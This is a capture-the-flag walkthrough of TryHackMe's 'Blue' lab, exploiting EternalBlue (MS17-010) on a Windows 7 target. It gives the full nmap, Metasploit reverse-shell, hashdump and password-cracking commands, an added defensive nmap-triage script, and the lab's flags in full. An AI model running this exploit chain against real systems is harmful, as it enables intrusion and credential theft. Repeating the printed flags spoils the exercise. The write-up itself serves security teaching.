
TryHackMe: Blue — EternalBlue (MS17-010) Walkthrough

Overview

Blue is a beginner-friendly Windows machine on TryHackMe that teaches exploitation of the MS17-010 (EternalBlue) vulnerability — the same exploit used in the devastating WannaCry ransomware attack of 2017.

Recon

nmap -sC -sV -oN nmap/blue 10.10.x.x

Key findings:

  • Port 135 (MSRPC)
  • Port 139 (NetBIOS)
  • Port 445 (SMB) — Microsoft Windows 7 Professional
  • SMB signing disabled

Enumeration

Ran Nmap’s vuln scripts against SMB:

nmap --script "smb-vuln*" -p445 10.10.x.x

Confirmed the target is vulnerable to MS17-010 (EternalBlue).
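
For auditing hosts you are responsible for, the two findings above (SMB signing state and the MS17-010 check) can be triaged from saved nmap output. The Python below is an added example, not part of the original write-up; the sample report is constructed, and it assumes the layout that nmap's smb-security-mode and smb-vuln-ms17-010 scripts print in normal (-oN) output.

```python
import re

# Constructed sample in nmap's normal (-oN) format; addresses are documentation ranges.
SAMPLE = """\
Nmap scan report for 192.0.2.10
445/tcp open  microsoft-ds Microsoft Windows 7 Professional
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|_    State: VULNERABLE
Nmap scan report for 192.0.2.20
445/tcp open  microsoft-ds
Host script results:
| smb-security-mode:
|_  message_signing: required
"""

HOST = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT = re.compile(r"^\|[_ ]([\w.-]+):")      # script header, e.g. "| smb-vuln-ms17-010:"
SIGNING = re.compile(r"message_signing:\s*(\w+)")
STATE = re.compile(r"State:\s*(\S+)")

def triage(report):
    """Map each host to its SMB exposure, signing mode and MS17-010 state."""
    hosts, cur, script = {}, None, None
    for line in report.splitlines():
        if m := HOST.match(line):
            cur = hosts.setdefault(m.group(1), {"smb_open": False,
                                                "signing": "unknown", "ms17_010": "not reported"})
            script = None                      # script results belong to one host only
        elif cur is None:
            continue                           # preamble before the first host
        elif re.match(r"445/tcp\s+open\b", line):
            cur["smb_open"] = True
        elif m := SCRIPT.match(line):
            script = m.group(1)                # remember which script block we are inside
        elif script == "smb-security-mode" and (m := SIGNING.search(line)):
            cur["signing"] = m.group(1)
        elif script == "smb-vuln-ms17-010" and (m := STATE.search(line)):
            cur["ms17_010"] = m.group(1)
    return hosts

def needs_action(hosts):
    """Hosts to patch or harden: MS17-010 vulnerable, or SMB open without required signing."""
    return sorted(h for h, r in hosts.items() if r["ms17_010"] == "VULNERABLE"
                  or (r["smb_open"] and r["signing"] != "required"))
```

Hosts where the vuln script did not report are marked "not reported" rather than assumed patched, since a missing result can also mean the check could not run.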

Exploitation

Launched Metasploit and used the EternalBlue exploit:

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
set LHOST tun0
run

The exploit succeeded, providing a Meterpreter session with NT AUTHORITY\SYSTEM privileges — the highest level on Windows.

Post-Exploitation

Hashdump

hashdump

Dumped all password hashes from the SAM database. Cracked the admin hash using John:

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Flag Capture

Used the Meterpreter search command to find all flag files:

search -f flag*.txt
cat "C:\\flag1.txt"
cat "C:\\Windows\\System32\\config\\flag2.txt"
cat "C:\\Users\\Jon\\Documents\\flag3.txt"

Flag 1: flag{access_the_machine}

Flag 2: flag{sam_database_elevated_access}

Flag 3: flag{admin_documents_can_be_valuable}

Flags

  1. flag{access_the_machine}
  2. flag{sam_database_elevated_access}
  3. flag{admin_documents_can_be_valuable}

Key Takeaways

  • EternalBlue remains one of the most impactful vulnerabilities in history
  • Always patch systems — MS17-010 has had a fix since March 2017
  • SMB should never be exposed to the internet
  • Meterpreter provides powerful post-exploitation capabilities for further assessment